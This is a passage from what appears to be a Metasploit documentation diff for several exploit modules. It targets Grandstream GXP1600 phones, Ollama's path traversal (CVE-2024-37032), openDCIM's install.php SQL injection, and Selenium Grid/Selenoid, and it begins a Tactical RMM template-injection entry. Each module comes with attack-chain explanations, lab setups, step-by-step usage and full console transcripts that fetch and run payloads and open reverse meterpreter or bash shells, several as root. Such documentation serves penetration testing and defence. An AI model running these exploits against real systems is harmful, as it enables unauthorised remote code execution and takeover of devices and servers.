firmware versions below version 1.0.7.81.
|
||||
|
||||
## Testing
|
||||
This module was verified on a GXP1630 device running firmware version 1.0.7.78.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. `use exploit/linux/http/grandstream_gxp1600_unauth_rce`
|
||||
|
||||
Configure the target:
|
||||
|
||||
3. `set RHOST <TARGET_IP_ADDRESS>`
|
||||
|
||||
Configure the payload to execute:
|
||||
|
||||
4. `set PAYLOAD cmd/linux/http/armle/meterpreter_reverse_tcp`
|
||||
5. `set RHOST eth0`
|
||||
6. `set RPORT 4444`
|
||||
7. `set FETCH_SRVHOST <MSF_IP_ADDRESS>`
|
||||
|
||||
Run the module:
|
||||
|
||||
8. `check`
|
||||
9. `exploit`
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Example 1
|
||||
|
||||
```
|
||||
msf > use exploit/linux/http/grandstream_gxp1600_unauth_rce
|
||||
[*] Using configured payload cmd/linux/http/armle/meterpreter_reverse_tcp
|
||||
msf exploit(linux/http/grandstream_gxp1600_unauth_rce) > set RHOST 192.168.86.77
|
||||
RHOST => 192.168.86.77
|
||||
msf exploit(linux/http/grandstream_gxp1600_unauth_rce) > set LHOST eth0
|
||||
LHOST => 192.168.86.122
|
||||
msf exploit(linux/http/grandstream_gxp1600_unauth_rce) > set FETCH_SRVHOST eth0
|
||||
[-] The following options failed to validate: Value 'eth0' is not valid for option 'FETCH_SRVHOST'.
|
||||
FETCH_SRVHOST =>
|
||||
msf exploit(linux/http/grandstream_gxp1600_unauth_rce) > set FETCH_SRVHOST 192.168.86.122
|
||||
FETCH_SRVHOST => 192.168.86.122
|
||||
msf exploit(linux/http/grandstream_gxp1600_unauth_rce) > show options
|
||||
|
||||
Module options (exploit/linux/http/grandstream_gxp1600_unauth_rce):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, http, socks5h
|
||||
RHOSTS 192.168.86.77 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
|
||||
RPORT 80 yes The target port (TCP)
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
TARGETURI / yes The base path to web admin
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (cmd/linux/http/armle/meterpreter_reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE true yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Pyth
|
||||
on ≥3.8, tested shells are sh, bash, zsh) (Accepted: none, python3.8+, shell-search, shell)
|
||||
FETCH_SRVHOST 192.168.86.122 no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
LHOST 192.168.86.122 yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,GET,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME eHuRcleTyo no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR /tmp yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Automatic
|
||||
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf exploit(linux/http/grandstream_gxp1600_unauth_rce) > check
|
||||
[*] 192.168.86.77:80 - The target appears to be vulnerable. GrandStream GXP1630 version 1.0.7.78
|
||||
msf exploit(linux/http/grandstream_gxp1600_unauth_rce) > exploit
|
||||
[*] Started reverse TCP handler on 192.168.86.122:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target appears to be vulnerable. GrandStream GXP1630 version 1.0.7.78
|
||||
[*] Meterpreter session 1 opened (192.168.86.122:4444 -> 192.168.86.77:59112) at 2026-02-16 12:21:07 +0000
|
||||
[!] This exploit may require manual cleanup of '/tmp/core.gz' on the target
|
||||
[!] This exploit may require manual cleanup of '/core' on the target
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: root
|
||||
meterpreter > sysinfo
|
||||
Computer : gxp1630_c074ade84b53
|
||||
OS : (Linux 3.4.20-rt31-dvf-v1.3.1.2-rc1)
|
||||
Architecture : armv5tejl
|
||||
BuildTuple : armv5l-linux-musleabi
|
||||
Meterpreter : armle/linux
|
||||
meterpreter > pwd
|
||||
/app/war/cgi-bin
|
||||
meterpreter > background
|
||||
[*] Backgrounding session 1...
|
||||
msf exploit(linux/http/grandstream_gxp1600_unauth_rce) > sessions -l
|
||||
|
||||
Active sessions
|
||||
===============
|
||||
|
||||
Id Name Type Information Connection
|
||||
-- ---- ---- ----------- ----------
|
||||
1 meterpreter armle/linux root @ gxp1630_c074ade84b53 192.168.86.122:4444 -> 192.168.86.77:59112 (192.168.86.77)
|
||||
|
||||
msf exploit(linux/http/grandstream_gxp1600_unauth_rce) >
|
||||
```
|
||||
@@ -0,0 +1,100 @@
|
||||
## Vulnerable Application
|
||||
|
||||
Ollama before 0.1.34 is vulnerable to a path traversal attack via the model
|
||||
pull mechanism (CVE-2024-37032, "Probllama"). When pulling a model from an OCI
|
||||
registry, the digest field in manifests is not validated - it accepts arbitrary
|
||||
path traversal sequences instead of enforcing `sha256:<64hex>`. This allows a
|
||||
rogue registry to write arbitrary files on the server.
|
||||
|
||||
This module chains the file write into full RCE by writing a malicious shared
|
||||
library and `/etc/ld.so.preload`, then spawning a new process via `/api/chat`
|
||||
to trigger the dynamic linker to load it. The library constructor forks, cleans
|
||||
up `ld.so.preload`, and executes the payload in the child process.
|
||||
|
||||
The default Ollama Docker image runs as root with the API bound to
|
||||
`0.0.0.0:11434`, making this a direct unauthenticated RCE.
|
||||
|
||||
Successfully tested against Ollama 0.1.33 on Docker.
|
||||
|
||||
### Install
|
||||
|
||||
```
|
||||
docker run -d -p 11434:11434 --name ollama ollama/ollama:0.1.33
|
||||
```
|
||||
|
||||
Verify it's running:
|
||||
|
||||
```
|
||||
curl http://127.0.0.1:11434/api/version
|
||||
{"version":"0.1.33"}
|
||||
```
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start the vulnerable Ollama container
|
||||
1. Start msfconsole
|
||||
1. Do: `use exploit/linux/http/ollama_rce_cve_2024_37032`
|
||||
1. Do: `set RHOSTS <target>`
|
||||
1. Do: `set LHOST <attacker>`
|
||||
1. Do: `set SRVHOST <attacker>`
|
||||
1. Do: `run`
|
||||
1. You should get a Meterpreter session as root.
|
||||
|
||||
## Options
|
||||
|
||||
### WRITABLE_DIR
|
||||
|
||||
Writable directory on the target for payload files. Defaults to `/tmp`.
|
||||
|
||||
### DEPTH
|
||||
|
||||
Number of `../` sequences used in the path traversal to reach the root
|
||||
filesystem from Ollama's blob storage directory. Defaults to `14`, which works
|
||||
for the standard Docker image. Adjust if the target uses a non-default
|
||||
`OLLAMA_MODELS` path with a different directory depth.
|
||||
|
||||
### SRVHOST / SRVPORT
|
||||
|
||||
The address and port for the rogue OCI registry. `SRVHOST` must be a routable
|
||||
IP reachable from the target (not `0.0.0.0`).
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Ollama 0.1.33 on Docker (Linux x64)
|
||||
|
||||
```
|
||||
msf6 > use exploit/linux/http/ollama_rce_cve_2024_37032
|
||||
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
|
||||
msf6 exploit(linux/http/ollama_rce_cve_2024_37032) > set RHOSTS 127.0.0.1
|
||||
RHOSTS => 127.0.0.1
|
||||
msf6 exploit(linux/http/ollama_rce_cve_2024_37032) > set LHOST 172.17.0.1
|
||||
LHOST => 172.17.0.1
|
||||
msf6 exploit(linux/http/ollama_rce_cve_2024_37032) > set SRVHOST 172.17.0.1
|
||||
SRVHOST => 172.17.0.1
|
||||
msf6 exploit(linux/http/ollama_rce_cve_2024_37032) > set SRVPORT 8088
|
||||
SRVPORT => 8088
|
||||
msf6 exploit(linux/http/ollama_rce_cve_2024_37032) > run
|
||||
|
||||
[*] Started reverse TCP handler on 172.17.0.1:4488
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target appears to be vulnerable. Ollama 0.1.33 (vulnerable to path traversal)
|
||||
[*] Using URL: http://172.17.0.1:8088/
|
||||
[*] Rogue OCI registry on 172.17.0.1:8088
|
||||
[*] Pull 1: 172.17.0.1:8088/haptic-driver/model (path traversal write)
|
||||
[+] Payload .so and ld.so.preload written via path traversal
|
||||
[*] Pull 2: 172.17.0.1:8088/wireless-protocol/model (registering trigger model)
|
||||
[+] Trigger model registered
|
||||
[*] Triggering RCE via /api/chat (spawning runner process)...
|
||||
[*] Transmitting intermediate stager...(126 bytes)
|
||||
[*] Sending stage (3090404 bytes) to 172.17.0.5
|
||||
[+] Deleted /tmp/CEFMQeff.so
|
||||
[*] Meterpreter session 1 opened (172.17.0.1:4488 -> 172.17.0.5:48630)
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: root
|
||||
meterpreter > sysinfo
|
||||
Computer : 6078642134f2
|
||||
OS : Debian 12.5 (Linux 6.14.0-123037-tuxedo)
|
||||
Architecture : x64
|
||||
Meterpreter : x64/linux
|
||||
```
|
||||
@@ -0,0 +1,231 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module exploits a SQL injection vulnerability in openDCIM's `install.php` endpoint
|
||||
(CVE-2026-28515) to achieve remote code execution.
|
||||
|
||||
After installation, `install.php` remains accessible and processes LDAP configuration
|
||||
parameters via `UpdateParameter()` without authentication or input sanitization. The
|
||||
attacker injects stacked SQL queries through the LDAP form to overwrite the Graphviz
|
||||
`dot` binary path in `fac_Config`, then triggers `report_network_map.php` which calls
|
||||
`exec()` with the poisoned value.
|
||||
|
||||
### Affected Versions
|
||||
|
||||
openDCIM version 23.04 (last public release), through commit 4467e9c4, is affected. Tested up to 25.01.
|
||||
|
||||
### Attack Chain
|
||||
|
||||
1. POST to `install.php` with stacked SQL via LDAP parameters (CWE-862 + CWE-89)
|
||||
2. Backup original config, overwrite `dot` parameter with command payload
|
||||
3. GET `report_network_map.php` which calls `exec()` with the poisoned `dot` value (CWE-78)
|
||||
4. Restore original configuration from backup table
|
||||
|
||||
## Lab Setup
|
||||
|
||||
### Docker (Recommended)
|
||||
|
||||
The official openDCIM Docker image (`opendcim/opendcim`) ships with no authentication
|
||||
configured. openDCIM delegates auth entirely to Apache via `$_SERVER['REMOTE_USER']` -
|
||||
without it, every page errors out. Real-world Docker deployments work around this by adding
|
||||
`SetEnv REMOTE_USER dcim` to the Apache vhost, which sets `REMOTE_USER` for every request
|
||||
without any actual credential check. This makes the entire application unauthenticated.
|
||||
|
||||
The lab reproduces this scenario. Create the following files:
|
||||
|
||||
**docker-compose.yml:**
|
||||
|
||||
```yaml
|
||||
services:
|
||||
web:
|
||||
build: .
|
||||
container_name: opendcim-lab
|
||||
ports:
|
||||
- "18091:80"
|
||||
environment:
|
||||
OPENDCIM_DB_HOST: db
|
||||
depends_on:
|
||||
db:
|
||||
condition: service_healthy
|
||||
|
||||
db:
|
||||
image: mariadb:10.7
|
||||
container_name: opendcim-db
|
||||
environment:
|
||||
MARIADB_ROOT_PASSWORD: rootpass
|
||||
MARIADB_DATABASE: dcim
|
||||
MARIADB_USER: dcim
|
||||
MARIADB_PASSWORD: dcim
|
||||
volumes:
|
||||
- db_data:/var/lib/mysql
|
||||
healthcheck:
|
||||
test: ["CMD", "mariadb", "-udcim", "-pdcim", "-e", "SELECT 1"]
|
||||
interval: 5s
|
||||
timeout: 5s
|
||||
retries: 20
|
||||
|
||||
volumes:
|
||||
db_data:
|
||||
```
|
||||
|
||||
**Dockerfile:**
|
||||
|
||||
```dockerfile
|
||||
FROM opendcim/opendcim:24.01-beta
|
||||
COPY 000-default.conf /etc/apache2/sites-available/
|
||||
```
|
||||
|
||||
**000-default.conf:**
|
||||
|
||||
```apache
|
||||
<VirtualHost *:80>
|
||||
ServerAdmin webmaster@localhost
|
||||
DocumentRoot /var/www/html
|
||||
<Directory "/var/www/html">
|
||||
Options -Indexes
|
||||
AllowOverride All
|
||||
SetEnv REMOTE_USER dcim
|
||||
</Directory>
|
||||
AllowEncodedSlashes On
|
||||
ErrorLog ${APACHE_LOG_DIR}/error.log
|
||||
CustomLog ${APACHE_LOG_DIR}/access.log combined
|
||||
</VirtualHost>
|
||||
```
|
||||
|
||||
Then run:
|
||||
|
||||
```bash
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
This starts openDCIM on port 18091 with `SetEnv REMOTE_USER dcim`, reproducing how Docker
|
||||
deployments are configured in the wild. No HTTP credentials are needed.
|
||||
|
||||
**Note:** If the target uses HTTP Basic Auth (htpasswd/LDAP), set `HttpUsername` and
|
||||
`HttpPassword` accordingly. Any valid Apache credential is enough - `install.php` has no
|
||||
role check.
|
||||
|
||||
**Note:** The fetch payload handler is not supported with Target 0 (Unix/Linux Command Shell)
|
||||
since standard fetch tools (curl, wget, etc.) are typically not available in the target's
|
||||
execution context (`exec()` via Graphviz dot path).
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. `use exploit/linux/http/opendcim_install_sqli_rce`
|
||||
3. `set RHOSTS <target>`
|
||||
4. `set RPORT <port>`
|
||||
5. `set HttpUsername <user>` (if Basic Auth is configured)
|
||||
6. `set HttpPassword <pass>`
|
||||
7. `set LHOST <attacker_ip>`
|
||||
8. `set payload cmd/unix/reverse_bash`
|
||||
9. `check`
|
||||
10. `exploit`
|
||||
11. You should get a shell as the Apache user (typically `www-data`)
|
||||
|
||||
## Options
|
||||
|
||||
### HttpUsername (Advanced)
|
||||
|
||||
HTTP Basic Auth username. Leave empty for deployments using Apache `SetEnv REMOTE_USER`.
|
||||
|
||||
### HttpPassword (Advanced)
|
||||
|
||||
HTTP Basic Auth password. Leave empty for deployments using Apache `SetEnv REMOTE_USER`.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### openDCIM 24.01 on Ubuntu - Command Shell (Target 0)
|
||||
|
||||
```
|
||||
msf6 > use exploit/linux/http/opendcim_install_sqli_rce
|
||||
msf6 exploit(linux/http/opendcim_install_sqli_rce) > set RHOSTS 127.0.0.1
|
||||
RHOSTS => 127.0.0.1
|
||||
msf6 exploit(linux/http/opendcim_install_sqli_rce) > set RPORT 18091
|
||||
RPORT => 18091
|
||||
msf6 exploit(linux/http/opendcim_install_sqli_rce) > set HttpUsername dcim
|
||||
HttpUsername => dcim
|
||||
msf6 exploit(linux/http/opendcim_install_sqli_rce) > set HttpPassword dcim
|
||||
HttpPassword => dcim
|
||||
msf6 exploit(linux/http/opendcim_install_sqli_rce) > set LHOST 192.168.64.1
|
||||
LHOST => 192.168.64.1
|
||||
msf6 exploit(linux/http/opendcim_install_sqli_rce) > set payload cmd/unix/reverse_bash
|
||||
payload => cmd/unix/reverse_bash
|
||||
msf6 exploit(linux/http/opendcim_install_sqli_rce) > check
|
||||
[*] install.php is accessible, testing time-based SQL injection
|
||||
[*] Test 1/3: SLEEP(5)
|
||||
[*] Elapsed time: 5.1 seconds.
|
||||
[*] Test 2/3: SLEEP(4)
|
||||
[*] Elapsed time: 4.0 seconds.
|
||||
[*] Test 3/3: SLEEP(6)
|
||||
[*] Elapsed time: 6.1 seconds.
|
||||
[+] 127.0.0.1:18091 - The target appears to be vulnerable. Successfully tested SQL injection (3/3 delay checks passed).
|
||||
msf6 exploit(linux/http/opendcim_install_sqli_rce) > exploit
|
||||
[*] Started reverse TCP handler on 192.168.64.1:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target appears to be vulnerable. Successfully tested SQL injection (3/3 delay checks passed).
|
||||
[*] Performing LORI attack (LDAP Override Remote Injection)
|
||||
[*] Triggering exec() via report_network_map.php
|
||||
[*] Restoring original configuration
|
||||
[+] Configuration restored successfully.
|
||||
[*] Command shell session 1 opened (192.168.64.1:4444 -> 192.168.64.3:45678) at 2026-02-28 15:00:00 +0100
|
||||
|
||||
id
|
||||
uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
||||
```
|
||||
|
||||
### openDCIM 24.01 on Ubuntu - Meterpreter via CmdStager (Target 1)
|
||||
|
||||
```
|
||||
msf6 > use exploit/linux/http/opendcim_install_sqli_rce
|
||||
msf6 exploit(linux/http/opendcim_install_sqli_rce) > set RHOSTS 127.0.0.1
|
||||
RHOSTS => 127.0.0.1
|
||||
msf6 exploit(linux/http/opendcim_install_sqli_rce) > set RPORT 18091
|
||||
RPORT => 18091
|
||||
msf6 exploit(linux/http/opendcim_install_sqli_rce) > set HttpUsername dcim
|
||||
HttpUsername => dcim
|
||||
msf6 exploit(linux/http/opendcim_install_sqli_rce) > set HttpPassword dcim
|
||||
HttpPassword => dcim
|
||||
msf6 exploit(linux/http/opendcim_install_sqli_rce) > set LHOST 192.168.64.1
|
||||
LHOST => 192.168.64.1
|
||||
msf6 exploit(linux/http/opendcim_install_sqli_rce) > set target 1
|
||||
target => 1
|
||||
msf6 exploit(linux/http/opendcim_install_sqli_rce) > set payload linux/x64/meterpreter/reverse_tcp
|
||||
payload => linux/x64/meterpreter/reverse_tcp
|
||||
msf6 exploit(linux/http/opendcim_install_sqli_rce) > exploit
|
||||
[*] Started reverse TCP handler on 192.168.64.1:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target appears to be vulnerable. Successfully tested SQL injection (3/3 delay checks passed).
|
||||
[*] Executing command stager
|
||||
[*] Sending stager progress: 100.00% (250/250 bytes)
|
||||
[*] Restoring original configuration
|
||||
[+] Configuration restored successfully.
|
||||
[*] Sending stage (3045380 bytes) to 192.168.64.3
|
||||
[*] Meterpreter session 1 opened (192.168.64.1:4444 -> 192.168.64.3:54321) at 2026-02-28 15:05:00 +0100
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: www-data
|
||||
```
|
||||
|
||||
### openDCIM with SetEnv REMOTE_USER (No Basic Auth)
|
||||
|
||||
```
|
||||
msf6 exploit(linux/http/opendcim_install_sqli_rce) > set RHOSTS 192.168.1.100
|
||||
RHOSTS => 192.168.1.100
|
||||
msf6 exploit(linux/http/opendcim_install_sqli_rce) > set RPORT 80
|
||||
RPORT => 80
|
||||
msf6 exploit(linux/http/opendcim_install_sqli_rce) > unset HttpUsername
|
||||
Unsetting HttpUsername...
|
||||
msf6 exploit(linux/http/opendcim_install_sqli_rce) > unset HttpPassword
|
||||
Unsetting HttpPassword...
|
||||
msf6 exploit(linux/http/opendcim_install_sqli_rce) > set payload cmd/unix/reverse_bash
|
||||
payload => cmd/unix/reverse_bash
|
||||
msf6 exploit(linux/http/opendcim_install_sqli_rce) > exploit
|
||||
[*] Started reverse TCP handler on 192.168.1.50:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target appears to be vulnerable. Successfully tested SQL injection (3/3 delay checks passed).
|
||||
[*] Performing LORI attack (LDAP Override Remote Injection)
|
||||
[*] Triggering exec() via report_network_map.php
|
||||
[*] Restoring original configuration
|
||||
[+] Configuration restored successfully.
|
||||
[*] Command shell session 1 opened (192.168.1.50:4444 -> 192.168.1.100:54321) at 2026-02-28 15:10:00 +0100
|
||||
```
|
||||
@@ -0,0 +1,197 @@
|
||||
## Vulnerable Application
|
||||
|
||||
Selenium Grid and Selenoid expose a WebDriver API that allows creating browser sessions
|
||||
with arbitrary capabilities. When deployed without authentication (the default for both),
|
||||
an attacker can achieve remote code execution through two browser-specific techniques:
|
||||
|
||||
**Chrome (binary override):** The `goog:chromeOptions` binary field can be set to an
|
||||
arbitrary executable such as `/usr/bin/python3`, since ChromeDriver does not validate it.
|
||||
This was fixed in Selenium Grid 4.11.0 via the stereotype capabilities merge. All Selenoid
|
||||
versions remain vulnerable.
|
||||
|
||||
**Firefox (profile handler):** A custom profile containing a malicious MIME handler that maps
|
||||
`application/sh` to `/bin/sh` can be injected via `moz:firefoxOptions`. Navigating to a
|
||||
`data:` URI with that content type triggers shell execution. This technique has never been
|
||||
patched and works on all Selenium Grid versions including the latest release (4.40.0 at the
|
||||
time of writing). This was originally reported in
|
||||
[SeleniumHQ/selenium#9526](https://github.com/SeleniumHQ/selenium/issues/9526) in May 2021.
|
||||
|
||||
The module auto-detects available browsers and selects the best attack vector. Firefox is
|
||||
preferred as it works on all Grid versions.
|
||||
|
||||
The default Docker images run as `seluser`/`selenium` with passwordless sudo, allowing
|
||||
trivial privilege escalation to root.
|
||||
|
||||
The vulnerability affects:
|
||||
|
||||
* Selenium Grid < 4.11.0 with Chrome nodes (binary override)
|
||||
* Selenium Grid - all versions with Firefox nodes (profile handler, unpatched)
|
||||
* Selenoid - all versions with Chrome or Firefox (project archived December 2024)
|
||||
|
||||
This module was successfully tested on:
|
||||
|
||||
* selenium/standalone-chrome:4.10.0 on Ubuntu 24.04 (Chrome binary override)
|
||||
* selenium/standalone-firefox:4.10.0 on Ubuntu 24.04 (Firefox profile handler)
|
||||
* selenium/standalone-firefox:latest (4.40.0) on Ubuntu 24.04 (Firefox profile handler)
|
||||
* Selenoid 1.11.3 with selenoid/chrome:128.0 on Ubuntu 24.04 (Chrome binary override)
|
||||
|
||||
### Installation (Selenium Grid - Firefox)
|
||||
|
||||
1. `docker pull selenium/standalone-firefox:latest`
|
||||
|
||||
2. `docker run -d -p 4444:4444 --shm-size="2g" selenium/standalone-firefox:latest`
|
||||
|
||||
### Installation (Selenium Grid - Chrome)
|
||||
|
||||
1. `docker pull selenium/standalone-chrome:4.10.0`
|
||||
|
||||
2. `docker run -d -p 4444:4444 --shm-size="2g" selenium/standalone-chrome:4.10.0`
|
||||
|
||||
### Installation (Selenoid)
|
||||
|
||||
1. Create `browsers.json`:
|
||||
```json
|
||||
{
|
||||
"chrome": {
|
||||
"default": "128.0",
|
||||
"versions": {
|
||||
"128.0": {
|
||||
"image": "selenoid/chrome:128.0",
|
||||
"port": "4444",
|
||||
"path": "/"
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
2. `docker pull selenoid/chrome:128.0`
|
||||
|
||||
3. Start Selenoid:
|
||||
```
|
||||
docker run -d -p 4444:4444 \
|
||||
-e DOCKER_API_VERSION=1.44 \
|
||||
-v $(pwd)/browsers.json:/etc/selenoid/browsers.json:ro \
|
||||
-v /var/run/docker.sock:/var/run/docker.sock \
|
||||
aerokube/selenoid:latest-release
|
||||
```
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the application
|
||||
2. Start msfconsole
|
||||
3. Do: `use exploit/linux/http/selenium_greed_rce`
|
||||
4. Do: `set RHOSTS <rhost>`
|
||||
5. Do: `set LHOST <lhost>`
|
||||
6. Do: `run`
|
||||
7. You should get a session
|
||||
|
||||
## Options
|
||||
|
||||
### BROWSER
|
||||
|
||||
Browser to exploit. Default is `auto` which detects available browsers and picks the
|
||||
best vector (Firefox preferred, Chrome fallback). Can be set to `firefox` or `chrome`
|
||||
to force a specific browser.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Firefox (auto-detected) - selenium/standalone-firefox:4.40.0 on Ubuntu 24.04
|
||||
|
||||
```
|
||||
msf6 > use exploit/linux/http/selenium_greed_rce
|
||||
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
|
||||
msf6 exploit(linux/http/selenium_greed_rce) > set RHOSTS 127.0.0.1
|
||||
RHOSTS => 127.0.0.1
|
||||
msf6 exploit(linux/http/selenium_greed_rce) > set LHOST 172.17.0.1
|
||||
LHOST => 172.17.0.1
|
||||
msf6 exploit(linux/http/selenium_greed_rce) > set LPORT 4480
|
||||
LPORT => 4480
|
||||
msf6 exploit(linux/http/selenium_greed_rce) > set TARGET 1
|
||||
TARGET => 1
|
||||
msf6 exploit(linux/http/selenium_greed_rce) > set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
|
||||
PAYLOAD => cmd/linux/http/x64/meterpreter/reverse_tcp
|
||||
msf6 exploit(linux/http/selenium_greed_rce) > set FETCH_SRVPORT 9100
|
||||
FETCH_SRVPORT => 9100
|
||||
msf6 exploit(linux/http/selenium_greed_rce) > run
|
||||
[*] Started reverse TCP handler on 172.17.0.1:4480
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target appears to be vulnerable. Selenium Grid 4.40.0 with Firefox (all versions vulnerable to profile handler)
|
||||
[*] Auto-selected Firefox (profile handler - works on all Grid versions)
|
||||
[*] Creating Firefox session with malicious profile...
|
||||
[*] Session created: 74d019ac-e7eb-4604-9c48-80baf43da5d9
|
||||
[*] Navigating to data: URI to trigger handler...
|
||||
[*] Sending stage (3090404 bytes) to 172.17.0.5
|
||||
[+] Deleted /tmp/EUeiCPJfsLF
|
||||
[*] Meterpreter session 1 opened (172.17.0.1:4480 -> 172.17.0.5:37004)
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: seluser
|
||||
meterpreter > sysinfo
|
||||
Computer : 56a95484dc83
|
||||
OS : Linux 6.14.0-123037-tuxedo
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
### Chrome (auto-detected) - selenium/standalone-chrome:4.10.0 on Ubuntu 24.04
|
||||
|
||||
```
|
||||
msf6 > use exploit/linux/http/selenium_greed_rce
|
||||
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
|
||||
msf6 exploit(linux/http/selenium_greed_rce) > set RHOSTS 127.0.0.1
|
||||
RHOSTS => 127.0.0.1
|
||||
msf6 exploit(linux/http/selenium_greed_rce) > set LHOST 172.17.0.1
|
||||
LHOST => 172.17.0.1
|
||||
msf6 exploit(linux/http/selenium_greed_rce) > set LPORT 4481
|
||||
LPORT => 4481
|
||||
msf6 exploit(linux/http/selenium_greed_rce) > run
|
||||
[*] Started reverse TCP handler on 172.17.0.1:4481
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target appears to be vulnerable. Selenium Grid 4.10.0 with Chrome (vulnerable to binary override)
|
||||
[*] Auto-selected Chrome (binary override)
|
||||
[*] Sending Chrome session request with binary override...
|
||||
[*] Sending stage (23404 bytes) to 172.17.0.7
|
||||
[*] Meterpreter session 1 opened (172.17.0.1:4481 -> 172.17.0.7:50292)
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: seluser
|
||||
meterpreter > sysinfo
|
||||
Computer : 90f5a4eefae5
|
||||
OS : Linux 6.14.0-123037-tuxedo
|
||||
Architecture : x64
|
||||
Meterpreter : python/linux
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
### Selenoid 1.11.3 - selenoid/chrome:128.0 on Ubuntu 24.04
|
||||
|
||||
```
|
||||
msf6 > use exploit/linux/http/selenium_greed_rce
|
||||
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
|
||||
msf6 exploit(linux/http/selenium_greed_rce) > set RHOSTS 127.0.0.1
|
||||
RHOSTS => 127.0.0.1
|
||||
msf6 exploit(linux/http/selenium_greed_rce) > set LHOST 172.17.0.1
|
||||
LHOST => 172.17.0.1
|
||||
msf6 exploit(linux/http/selenium_greed_rce) > set LPORT 4453
|
||||
LPORT => 4453
|
||||
msf6 exploit(linux/http/selenium_greed_rce) > run
|
||||
[*] Started reverse TCP handler on 172.17.0.1:4453
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target appears to be vulnerable. Selenoid 1.11.3 built at 2024-05-25_12:34:40PM (all versions vulnerable)
|
||||
[*] Auto-selected Chrome (binary override)
|
||||
[*] Sending Chrome session request with binary override...
|
||||
[*] Sending stage (23408 bytes) to 172.17.0.10
|
||||
[*] Meterpreter session 1 opened (172.17.0.1:4453 -> 172.17.0.10:42984)
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: selenium
|
||||
meterpreter > sysinfo
|
||||
Computer : 669a719f93da
|
||||
OS : Linux 6.14.0-123037-tuxedo
|
||||
Architecture : x64
|
||||
Meterpreter : python/linux
|
||||
meterpreter >
|
||||
```
|
||||
@@ -0,0 +1,405 @@
|
||||
## Vulnerable Application
|
||||
|
||||
A Server-Side Template Injection (SSTI) vulnerability in Tactical RMM allows authenticated
|
||||
users to execute arbitrary code on the server (CVE-2025-69516).
|
||||
|
||||
The reporting template preview endpoint (`/reporting/templates/preview/`) passes user-controlled
|
||||
Jinja2 template content to `Environment.from_string()` without sandboxing. This allows breaking
|
||||
out of the template context and executing arbitrary Python code.
|
||||
|
||||
The vulnerability affects:
|
||||
|
||||
* Tactical RMM < 1.4.0
|
||||
|
||||
This module was successfully tested on:
|
||||
|
||||
* Tactical RMM 1.3.1 (Docker) on Ubuntu
|
||||
|
||||
### Docker Setup
|
||||
|
||||
1. Create a working directory and the following `.env` file:
|
||||
|
||||
```
|
||||
IMAGE_REPO=tacticalrmm/
|
||||
VERSION=1.3.1
|
||||
|
||||
APP_HOST=rmm.localhost
|
||||
API_HOST=api.localhost
|
||||
MESH_HOST=mesh.localhost
|
||||
|
||||
CSRF_COOKIE_DOMAIN=.localhost
|
||||
SESSION_COOKIE_DOMAIN=.localhost
|
||||
|
||||
